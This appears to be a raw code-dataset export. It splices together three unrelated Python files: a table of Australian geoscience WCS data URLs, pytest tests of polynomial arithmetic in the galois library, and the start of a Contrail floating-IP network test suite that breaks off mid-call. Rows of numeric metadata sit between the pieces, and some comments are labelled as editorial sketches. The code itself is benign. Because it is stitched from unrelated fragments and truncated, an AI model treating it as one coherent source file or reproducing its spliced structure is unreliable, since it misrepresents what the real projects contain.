# 'mgoh_group_composition': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_MgOH_group_composition_reprojected.nc4',
'ferrous_iron_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_Ferrous_iron_content_in_MgOH_reprojected.nc4',
'aloh_groun_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Aus_Mainland/Aus_Mainland_AlOH_group_content_reprojected.nc4',
'thermal_infrared_gypsum_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/thermal/Aus_ASTER_L2EM_Gypsum_Index_reprojected.nc4',
'thermal_infrared_silica_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/thermal/Aus_ASTER_L2EM_Silica_Index_reprojected.nc4'
}
ASTER_TAS = {
'aloh_group_composition': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_AlOH_Group_composition_reprojected.nc4',
'ferrous_iron_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_Ferrous_Iron_index_reprojected.nc4',
'opaque_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_Opaque_index_reprojected.nc4',
'ferric_oxide_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_Ferric_Oxide_content_reprojected.nc4',
# 'feoh_group_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_FeOH_Group_content_reprojected.nc4',
'kaolin_group_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_Kaolin_group_index_reprojected.nc4',
'tir_quartz_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/thermal/Aus_ASTER_L2EM_Quartz_Index_reprojected.nc4',
'mgoh_group_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_MgOH_group_content_reprojected.nc4',
# 'mgoh_group_composition': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_MgOH_group_composition_reprojected.nc4',
'ferrous_iron_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_Ferrous_iron_in_MgOH_content_reprojected.nc4',
'aloh_groun_content': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/vnir/Tasmania/Tas_AlOH_group_content_reprojected.nc4',
'thermal_infrared_gypsum_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/thermal/Aus_ASTER_L2EM_Gypsum_Index_reprojected.nc4',
'thermal_infrared_silica_index': 'http://dap-wms.nci.org.au/thredds/wcs/wx7/aster/thermal/Aus_ASTER_L2EM_Silica_Index_reprojected.nc4'
}
GRAVITY = {
'isostatic_residual_gravity_anomaly': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/onshore_geodetic_Isostatic_Residual_v2_2016/onshore_geodetic_Isostatic_Residual_v2_2016.nc',
'bouger_gravity_anomaly': 'http://dap-wms.nci.org.au/thredds/wcs/rr2/geophysics/onshore_geodetic_Complete_Bouguer_2016/onshore_geodetic_Complete_Bouguer_2016.nc',
}
TOTAL_COVERAGES = len(ASTER) + len(GRAVITY) + len(RADMAP) + len(MAGNETICS)
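# Illustrative usage (editorial sketch): the module is just a lookup table of
# WCS endpoints, so a typical consumer simply iterates the dictionaries.
if __name__ == '__main__':
    all_coverages = {**RADMAP, **MAGNETICS, **ASTER, **GRAVITY}
    print('{} coverages (TOTAL_COVERAGES = {})'.format(len(all_coverages), TOTAL_COVERAGES))
    for name, url in sorted(all_coverages.items()):
        print('{:35s} {}'.format(name, url))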
| 89.413793
| 188
| 0.799846
| 807
| 5,186
| 4.80917
| 0.133829
| 0.061324
| 0.087606
| 0.113888
| 0.876063
| 0.833033
| 0.817315
| 0.817315
| 0.817315
| 0.817315
| 0
| 0.030867
| 0.056691
| 5,186
| 57
| 189
| 90.982456
| 0.762469
| 0.148862
| 0
| 0.146341
| 0
| 0.731707
| 0.879499
| 0.071298
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
96063f5109ed1d56ea93c00c9e0f30b1fa544945
| 3,712
|
py
|
Python
|
tests/polys/test_non_poly_arithmetic.py
|
mhostetter/galois
|
280a3e906083db6834c6f4f5370fbbe5805ff875
|
[
"MIT"
] | 65
|
2021-02-20T04:07:59.000Z
|
2022-03-13T10:14:58.000Z
|
tests/polys/test_non_poly_arithmetic.py
|
mhostetter/galois
|
280a3e906083db6834c6f4f5370fbbe5805ff875
|
[
"MIT"
] | 303
|
2021-02-22T19:36:25.000Z
|
2022-03-31T14:48:15.000Z
|
tests/polys/test_non_poly_arithmetic.py
|
mhostetter/galois
|
280a3e906083db6834c6f4f5370fbbe5805ff875
|
[
"MIT"
] | 9
|
2021-03-11T07:40:51.000Z
|
2022-03-06T20:13:17.000Z
|
"""
A pytest module to test polynomial and non-polynomial arithmetic.
"""
import pytest
import numpy as np
import galois
def test_add():
GF = galois.GF(3)
poly = galois.Poly.Random(5, field=GF)
e = GF.Random(low=1) # Random field element
e_poly = galois.Poly(e)
assert poly + e == poly + e_poly
assert e + poly == e_poly + poly
# Not a Galois field array
with pytest.raises(TypeError):
poly + 1
with pytest.raises(TypeError):
1 + poly
# Not a 0-D Galois field array
with pytest.raises(ValueError):
poly + GF.Random(3, low=1)
with pytest.raises(ValueError):
GF.Random(3, low=1) + poly
def test_subtract():
GF = galois.GF(3)
poly = galois.Poly.Random(5, field=GF)
e = GF.Random(low=1) # Random field element
e_poly = galois.Poly(e)
assert poly - e == poly - e_poly
assert e - poly == e_poly - poly
# Not a Galois field array
with pytest.raises(TypeError):
poly - 1
with pytest.raises(TypeError):
1 - poly
# Not a 0-D Galois field array
with pytest.raises(ValueError):
poly - GF.Random(3, low=1)
with pytest.raises(ValueError):
GF.Random(3, low=1) - poly
def test_multiply():
GF = galois.GF(3)
poly = galois.Poly.Random(5, field=GF)
e = GF.Random(low=1) # Random field element
e_poly = galois.Poly(e)
assert poly * e == poly * e_poly
assert e * poly == e_poly * poly
# Not a Galois field array
with pytest.raises(TypeError):
poly * 1
with pytest.raises(TypeError):
1 * poly
# Not a 0-D Galois field array
with pytest.raises(ValueError):
poly * GF.Random(3, low=1)
with pytest.raises(ValueError):
GF.Random(3, low=1) * poly
def test_true_divide():
GF = galois.GF(3)
poly = galois.Poly.Random(5, field=GF)
e = GF.Random(low=1) # Random field element
e_poly = galois.Poly(e)
assert poly / e == poly / e_poly
assert e / poly == e_poly / poly
# Not a Galois field array
with pytest.raises(TypeError):
poly / 1
with pytest.raises(TypeError):
1 / poly
# Not a 0-D Galois field array
with pytest.raises(ValueError):
poly / GF.Random(3, low=1)
with pytest.raises(ValueError):
GF.Random(3, low=1) / poly
def test_floor_divide():
GF = galois.GF(3)
poly = galois.Poly.Random(5, field=GF)
e = GF.Random(low=1) # Random field element
e_poly = galois.Poly(e)
assert poly // e == poly // e_poly
assert e // poly == e_poly // poly
# Not a Galois field array
with pytest.raises(TypeError):
poly // 1
with pytest.raises(TypeError):
1 // poly
# Not a 0-D Galois field array
with pytest.raises(ValueError):
poly // GF.Random(3, low=1)
with pytest.raises(ValueError):
GF.Random(3, low=1) // poly
def test_mod():
GF = galois.GF(3)
poly = galois.Poly.Random(5, field=GF)
e = GF.Random(low=1) # Random field element
e_poly = galois.Poly(e)
assert poly % e == poly % e_poly
assert e % poly == e_poly % poly
# Not a Galois field array
with pytest.raises(TypeError):
poly % 1
with pytest.raises(TypeError):
1 % poly
# Not a 0-D Galois field array
with pytest.raises(ValueError):
poly % GF.Random(3, low=1)
with pytest.raises(ValueError):
GF.Random(3, low=1) % poly
def test_equal():
GF = galois.GF(3)
poly = galois.Poly([2], field=GF)
assert poly == galois.Poly([2], field=GF)
# Not a polynomial
with pytest.raises(TypeError):
assert poly == GF(2)
with pytest.raises(TypeError):
poly == 2
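# Editorial sketch of the behaviour these tests pin down: a polynomial may be
# combined with a 0-D Galois field element (treated as a degree-0 polynomial),
# but not with a plain int or a non-scalar array.
#
#     import galois
#
#     GF = galois.GF(3)
#     p = galois.Poly([1, 2], field=GF)   # x + 2 over GF(3)
#     e = GF(2)                           # 0-D field element
#     print(p + e)                        # same result as p + galois.Poly(e)
#     p + 1                               # raises TypeError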
| 25.424658
| 65
| 0.604795
| 555
| 3,712
| 3.996396
| 0.077477
| 0.067628
| 0.187556
| 0.1578
| 0.911632
| 0.898557
| 0.885032
| 0.87376
| 0.87376
| 0.87376
| 0
| 0.024164
| 0.275323
| 3,712
| 145
| 66
| 25.6
| 0.800372
| 0.143588
| 0
| 0.504951
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138614
| 1
| 0.069307
| false
| 0
| 0.029703
| 0
| 0.09901
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82c4cbc08f701e8c7687ebdff2ff2f7a3f0afa9f
| 129,067
|
py
|
Python
|
scripts/floating_ip_tests.py
|
rombie/contrail-test
|
a68c71d6f282142501a7e2e889bbb232fdd82dc3
|
[
"Apache-2.0"
] | null | null | null |
scripts/floating_ip_tests.py
|
rombie/contrail-test
|
a68c71d6f282142501a7e2e889bbb232fdd82dc3
|
[
"Apache-2.0"
] | null | null | null |
scripts/floating_ip_tests.py
|
rombie/contrail-test
|
a68c71d6f282142501a7e2e889bbb232fdd82dc3
|
[
"Apache-2.0"
] | null | null | null |
# Need to import path to test/fixtures and test/scripts/
# Ex : export PYTHONPATH='$PATH:/root/test/fixtures/:/root/test/scripts/'
#
# To run tests, you can do 'python -m testtools.run tests'. To list the tests,
# you can do 'python -m testtools.run -l tests'
# Set the env variable PARAMS_FILE to point to your ini file. Else it will try to pick params.ini in PWD
#
import re
import os
from novaclient import client as mynovaclient
from novaclient import exceptions as novaException
import fixtures
import testtools
import unittest
from contrail_test_init import *
from vn_test import *
from quantum_test import *
from vnc_api_test import *
from nova_test import *
from vm_test import *
from connections import ContrailConnections
from floating_ip import *
from policy_test import *
from multiple_vn_vm_test import *
from contrail_fixtures import *
from tcutils.wrappers import preposttest_wrapper
from tcutils.commands import *
from testresources import ResourcedTestCase
from floating_ip_test_resource import SolnSetupResource
import traffic_tests
from fabric.context_managers import settings
from fabric.api import run
class TestFipCases(testtools.TestCase, ResourcedTestCase, fixtures.TestWithFixtures):
resources = [('base_setup', SolnSetupResource)]
def __init__(self, *args, **kwargs):
testtools.TestCase.__init__(self, *args, **kwargs)
self.res = SolnSetupResource.getResource()
self.inputs = self.res.inputs
self.connections = self.res.connections
self.logger = self.res.logger
self.nova_fixture = self.res.nova_fixture
self.agent_inspect = self.connections.agent_inspect
self.cn_inspect = self.connections.cn_inspect
self.analytics_obj = self.connections.analytics_obj
self.vnc_lib = self.connections.vnc_lib
def __del__(self):
print "Deleting test_with_setup now"
SolnSetupResource.finishedWith(self.res)
def setUp(self):
super(TestFipCases, self).setUp()
if 'PARAMS_FILE' in os.environ:
self.ini_file = os.environ.get('PARAMS_FILE')
else:
self.ini_file = 'params.ini'
def tearDown(self):
print "Tearing down test"
super(TestFipCases, self).tearDown()
SolnSetupResource.finishedWith(self.res)
def runTest(self):
pass
# end runTest
@preposttest_wrapper
def test_communication_across_borrower_vm(self):
        '''Test communication between VMs that have borrowed FIPs from a common FIP pool.
'''
result = True
fip_pool_name = 'some-pool1'
#fvn_name= self.res.fip_vn_name
fvn_fixture = self.res.fvn1_fixture
vn1_fixture = self.res.vn1_fixture
vn2_fixture = self.res.vn2_fixture
vn1_vm1_fixture = self.res.vn1_vm1_fixture
vn2_vm1_fixture = self.res.vn2_vm1_fixture
fvn_vm1_fixture = self.res.fvn1_vm1_fixture
fvn_subnets = self.res.fvn1_subnets
vm1_name = self.res.vn1_vm1_name
vn1_name = self.res.vn1_name
vn1_subnets = self.res.vn1_subnets
vm2_name = self.res.vn2_vm1_name
vn2_name = self.res.vn2_name
vn2_subnets = self.res.vn2_subnets
assert fvn_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert vn2_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
assert vn2_vm1_fixture.verify_on_setup()
assert fvn_vm1_fixture.verify_on_setup()
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
fip_id = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vn1_vm1_fixture.vm_id)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
assert fip_fixture.verify_fip(fip_id, vn1_vm1_fixture, fvn_fixture)
fip_id1 = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vn2_vm1_fixture.vm_id)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id1)
assert fip_fixture.verify_fip(fip_id1, vn2_vm1_fixture, fvn_fixture)
if not vn1_vm1_fixture.ping_with_certainty(fip_fixture.fip[fip_id1]):
result = result and False
# fip_fixture.disassoc_and_delete_fip(fip_id)
# fip_fixture.disassoc_and_delete_fip(fip_id1)
if not result:
            self.logger.error('Test to ping between VMs %s and %s failed' %
                              (vm1_name, vm2_name))
assert result
return True
# end test_communication_across_borrower_vm
@preposttest_wrapper
def test_mutual_floating_ip(self):
        '''Test communication when 2 VMs in 2 different VNs borrow FIPs from each other.
'''
result = True
fip_pool_name1 = 'some-pool1'
fip_pool_name2 = 'some-pool2'
#fvn_name= self.res.fip_vn_name
fvn1_fixture = self.res.fvn1_fixture
fvn2_fixture = self.res.fvn2_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_name = self.res.fvn1_vm1_name
fvn2_vm1_fixture = self.res.fvn2_vm1_fixture
fvn2_subnets = self.res.fvn2_subnets
fvn2_vm1_name = self.res.fvn2_vm1_name
assert fvn1_fixture.verify_on_setup()
assert fvn2_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
assert fvn2_vm1_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, fvn2_vm1_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(
fip_id1, fvn2_vm1_fixture, fvn1_fixture)
fip_fixture2 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name2, vn_id=fvn2_fixture.vn_id))
assert fip_fixture2.verify_on_setup()
fip_id2 = fip_fixture2.create_and_assoc_fip(
fvn2_fixture.vn_id, fvn1_vm1_fixture.vm_id)
self.addCleanup(fip_fixture2.disassoc_and_delete_fip, fip_id2)
assert fip_fixture2.verify_fip(fip_id2, fvn1_vm1_fixture, fvn2_fixture)
if not fvn2_vm1_fixture.ping_with_certainty(fip_fixture2.fip[fip_id2]):
result = result and False
if not fvn1_vm1_fixture.ping_with_certainty(fip_fixture1.fip[fip_id1]):
result = result and False
# fip_fixture1.disassoc_and_delete_fip(fip_id1)
# fip_fixture2.disassoc_and_delete_fip(fip_id2)
if not result:
            self.logger.error('Test to ping between VMs %s and %s failed' %
                              (fvn1_vm1_name, fvn2_vm1_name))
assert result
return result
# end test_mutual_floating_ip
@preposttest_wrapper
def test_exhust_Fip_pool_and_release_fip(self):
'''Test exhaustion of FIP pool and release and reuse of FIP
'''
        # This test case combines 2 test cases from the test plan:
        # 1. Test when a FIP is released
        # 2. Test with all the available floating IPs in the pool used/allocated to
        # different VMs
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn2_fixture = self.res.fvn2_fixture
fvn3_fixture = self.res.fvn3_fixture
vn1_fixture = self.res.vn1_fixture
vn2_fixture = self.res.vn2_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_name = self.res.fvn1_vm1_name
fvn2_vm1_fixture = self.res.fvn2_vm1_fixture
fvn2_subnets = self.res.fvn2_subnets
fvn2_vm1_name = self.res.fvn2_vm1_name
fvn3_vm1_fixture = self.res.fvn3_vm1_fixture
fvn3_subnets = self.res.fvn3_subnets
fvn3_vm1_name = self.res.fvn3_vm1_name
vn1_vm1_fixture = self.res.vn1_vm1_fixture
vn1_vm2_fixture = self.res.vn1_vm2_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_name = self.res.vn1_vm1_name
vn1_vm2_name = self.res.vn1_vm2_name
vn2_vm1_fixture = self.res.vn2_vm1_fixture
vn2_vm2_fixture = self.res.vn2_vm2_fixture
vn2_subnets = self.res.vn2_subnets
vn2_vm1_name = self.res.vn2_vm1_name
vn2_vm2_name = self.res.vn2_vm2_name
assert fvn1_fixture.verify_on_setup()
assert fvn2_fixture.verify_on_setup()
assert fvn3_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
assert fvn2_vm1_fixture.verify_on_setup()
assert fvn3_vm1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
assert vn1_vm2_fixture.verify_on_setup()
assert vn2_vm1_fixture.verify_on_setup()
assert vn2_vm2_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn3_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
        # Allocate FIPs to multiple VMs to exhaust the pool of 5 addresses
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn1_vm1_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id1, vn1_vm1_fixture, fvn3_fixture)
fip_id2 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn1_vm2_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id2, vn1_vm2_fixture, fvn3_fixture)
fip_id3 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn2_vm1_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id3, vn2_vm1_fixture, fvn3_fixture)
fip_id4 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn2_vm2_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id4, vn2_vm2_fixture, fvn3_fixture)
        self.logger.info(
            'Floating IP pool is already exhausted. Further allocation should not be allowed; a Quantum exception is expected')
fip_id5 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, fvn1_vm1_fixture.vm_id)
        if fip_id5 is not None:
            self.logger.error(
                'FIP should not get created/associated as the pool is already exhausted')
result = result and False
self.logger.info('Releasing one FIP.')
fip_fixture1.disassoc_and_delete_fip(fip_id1)
if not vn1_vm1_fixture.ping_to_ip(fvn3_vm1_fixture.vm_ip):
self.logger.info(
"Here ping should fail from VM as FIP is removed ")
else:
self.logger.error(
"Ping should fail. But ping is successful even after removal of FIP from VM %s" % (vn1_vm1_name))
result = result and False
        self.logger.info('Now FIP should get created and associated with %s' %
                         (fvn1_vm1_name))
fip_id5 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, fvn1_vm1_fixture.vm_id)
assert fip_fixture1.verify_fip(
fip_id5, fvn1_vm1_fixture, fvn3_fixture)
if not fvn1_vm1_fixture.ping_with_certainty(fvn3_vm1_fixture.vm_ip):
result = result and False
fip_fixture1.disassoc_and_delete_fip(fip_id2)
fip_fixture1.disassoc_and_delete_fip(fip_id3)
fip_fixture1.disassoc_and_delete_fip(fip_id4)
fip_fixture1.disassoc_and_delete_fip(fip_id5)
if not result:
self.logger.error(
'Test Failed. Exhaustion of FIP pool test failed')
assert result
return result
    # end test_exhust_Fip_pool_and_release_fip
@preposttest_wrapper
def test_extend_fip_pool_runtime(self):
        '''Test that adding a subnet to the VN extends the FIP pool, and that a borrower VM can reach multiple subnets of the allocating VN.
'''
        # This test case combines 2 test cases from the test plan:
        # 1. Test when more IP blocks are added to an existing FIP pool
        # 2. When the allocating VN has multiple subnets, the borrower VM should
        # be able to communicate with all the subnets
result = True
fip_pool_name1 = 'some-pool1'
additional_subnet = '180.1.1.0/24'
fvn1_fixture = self.res.fvn1_fixture
fvn2_fixture = self.res.fvn2_fixture
fvn3_fixture = self.res.fvn3_fixture
vn1_fixture = self.res.vn1_fixture
vn2_fixture = self.res.vn2_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_name = self.res.fvn1_vm1_name
fvn2_vm1_fixture = self.res.fvn2_vm1_fixture
fvn2_subnets = self.res.fvn2_subnets
fvn2_vm1_name = self.res.fvn2_vm1_name
fvn3_vm1_fixture = self.res.fvn3_vm1_fixture
fvn3_subnets = self.res.fvn3_subnets
fvn3_vm1_name = self.res.fvn3_vm1_name
vn1_vm1_fixture = self.res.vn1_vm1_fixture
vn1_vm2_fixture = self.res.vn1_vm2_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_name = self.res.vn1_vm1_name
vn1_vm2_name = self.res.vn1_vm2_name
vn2_vm1_fixture = self.res.vn2_vm1_fixture
vn2_vm2_fixture = self.res.vn2_vm2_fixture
vn2_subnets = self.res.vn2_subnets
vn2_vm1_name = self.res.vn2_vm1_name
vn2_vm2_name = self.res.vn2_vm2_name
assert fvn1_fixture.verify_on_setup()
assert fvn2_fixture.verify_on_setup()
assert fvn3_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
assert fvn2_vm1_fixture.verify_on_setup()
assert fvn3_vm1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
assert vn1_vm2_fixture.verify_on_setup()
assert vn2_vm1_fixture.verify_on_setup()
assert vn2_vm2_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn3_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
        # Allocate FIPs to multiple VMs to exhaust the pool of 5 addresses
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn1_vm1_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id1, vn1_vm1_fixture, fvn3_fixture)
fip_id2 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn1_vm2_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id2, vn1_vm2_fixture, fvn3_fixture)
fip_id3 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn2_vm1_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id3, vn2_vm1_fixture, fvn3_fixture)
fip_id4 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, vn2_vm2_fixture.vm_id)
assert fip_fixture1.verify_fip(fip_id4, vn2_vm2_fixture, fvn3_fixture)
        self.logger.info(
            'Floating IP pool is already exhausted. Further allocation should not be allowed; a Quantum exception is expected')
fip_id5 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, fvn1_vm1_fixture.vm_id)
        if fip_id5 is not None:
            self.logger.error(
                'FIP should not get created/associated as the pool is already exhausted')
result = result and False
# Here we need to add further Subnet to FVN3
fvn3_fixture.add_subnet(additional_subnet)
# Launching additional VM which should get IP from additional subnet
additional_vm_fixture = self.useFixture(VMFixture(
project_name=self.inputs.project_name, connections=self.connections, vn_obj=fvn3_fixture.obj, vm_name='additional_vm'))
assert additional_vm_fixture.verify_on_setup()
        # Now verify that the floating IP pool has also been extended and a FIP is available
fip_id5 = fip_fixture1.create_and_assoc_fip(
fvn3_fixture.vn_id, fvn1_vm1_fixture.vm_id)
assert fip_fixture1.verify_fip(
fip_id5, fvn1_vm1_fixture, fvn3_fixture)
        # Verify that from the borrower VM we can ping all the subnets of the giving VN
if not fvn1_vm1_fixture.ping_with_certainty(fvn3_vm1_fixture.vm_ip):
result = result and False
if not fvn1_vm1_fixture.ping_with_certainty(additional_vm_fixture.vm_ip):
result = result and False
fip_fixture1.disassoc_and_delete_fip(fip_id1)
fip_fixture1.disassoc_and_delete_fip(fip_id2)
fip_fixture1.disassoc_and_delete_fip(fip_id3)
fip_fixture1.disassoc_and_delete_fip(fip_id4)
fip_fixture1.disassoc_and_delete_fip(fip_id5)
if not result:
            self.logger.error(
                'Test Failed. Extension of FIP pool and communication across multiple subnets test failed')
assert result
return result
# end test_extend_fip_pool_runtime
@preposttest_wrapper
def test_service_restart_with_fip(self):
'''Test restart of agent and control service with floating IP
'''
result = True
fip_pool_name1 = 'some-pool1'
fip_pool_name2 = 'some-pool2'
#fvn_name= self.res.fip_vn_name
fvn1_fixture = self.res.fvn1_fixture
fvn2_fixture = self.res.fvn2_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_name = self.res.fvn1_vm1_name
fvn2_vm1_fixture = self.res.fvn2_vm1_fixture
fvn2_subnets = self.res.fvn2_subnets
fvn2_vm1_name = self.res.fvn2_vm1_name
assert fvn1_fixture.verify_on_setup()
assert fvn2_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
assert fvn2_vm1_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, fvn2_vm1_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(
fip_id1, fvn2_vm1_fixture, fvn1_fixture)
fip_fixture2 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name2, vn_id=fvn2_fixture.vn_id))
assert fip_fixture2.verify_on_setup()
fip_id2 = fip_fixture2.create_and_assoc_fip(
fvn2_fixture.vn_id, fvn1_vm1_fixture.vm_id)
self.addCleanup(fip_fixture2.disassoc_and_delete_fip, fip_id2)
assert fip_fixture2.verify_fip(fip_id2, fvn1_vm1_fixture, fvn2_fixture)
if not fvn2_vm1_fixture.ping_with_certainty(fip_fixture2.fip[fip_id2]):
result = result and False
if not fvn1_vm1_fixture.ping_with_certainty(fip_fixture1.fip[fip_id1]):
result = result and False
self.logger.info('Will restart compute services now')
for compute_ip in self.inputs.compute_ips:
self.inputs.restart_service('contrail-vrouter', [compute_ip])
sleep(10)
assert fvn1_vm1_fixture.verify_on_setup()
assert fvn2_vm1_fixture.verify_on_setup()
if not fvn2_vm1_fixture.ping_with_certainty(fip_fixture2.fip[fip_id2]):
result = result and False
if not fvn1_vm1_fixture.ping_with_certainty(fip_fixture1.fip[fip_id1]):
result = result and False
self.logger.info('Will restart control services now')
for bgp_ip in self.inputs.bgp_ips:
self.inputs.restart_service('contrail-control', [bgp_ip])
sleep(10)
assert fvn1_vm1_fixture.verify_on_setup()
assert fvn2_vm1_fixture.verify_on_setup()
if not fvn2_vm1_fixture.ping_with_certainty(fip_fixture2.fip[fip_id2]):
result = result and False
if not fvn1_vm1_fixture.ping_with_certainty(fip_fixture1.fip[fip_id1]):
result = result and False
# fip_fixture1.disassoc_and_delete_fip(fip_id1)
# fip_fixture2.disassoc_and_delete_fip(fip_id2)
if not result:
self.logger.error(
'Test Failed for restart of agent and control node with floating IP')
assert result
return result
# end test_service_restart_with_fip
@preposttest_wrapper
def test_fip_with_traffic(self):
        '''Test traffic across the borrower and giving VNs.
'''
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn1_vm1_traffic_fixture = self.res.fvn1_vm1_traffic_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_traffic_name = self.res.fvn1_vm1_traffic_name
vn1_fixture = self.res.vn1_fixture
vn1_vm1_traffic_fixture = self.res.vn1_vm1_traffic_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_traffic_name = self.res.vn1_vm1_traffic_name
assert fvn1_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert fvn1_vm1_traffic_fixture.verify_on_setup()
assert vn1_vm1_traffic_fixture.verify_on_setup()
fvn1_vm1_traffic_fixture.wait_till_vm_is_up()
vn1_vm1_traffic_fixture.wait_till_vm_is_up()
# Install traffic pkg in VM
vn1_vm1_traffic_fixture.install_pkg("Traffic")
fvn1_vm1_traffic_fixture.install_pkg("Traffic")
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
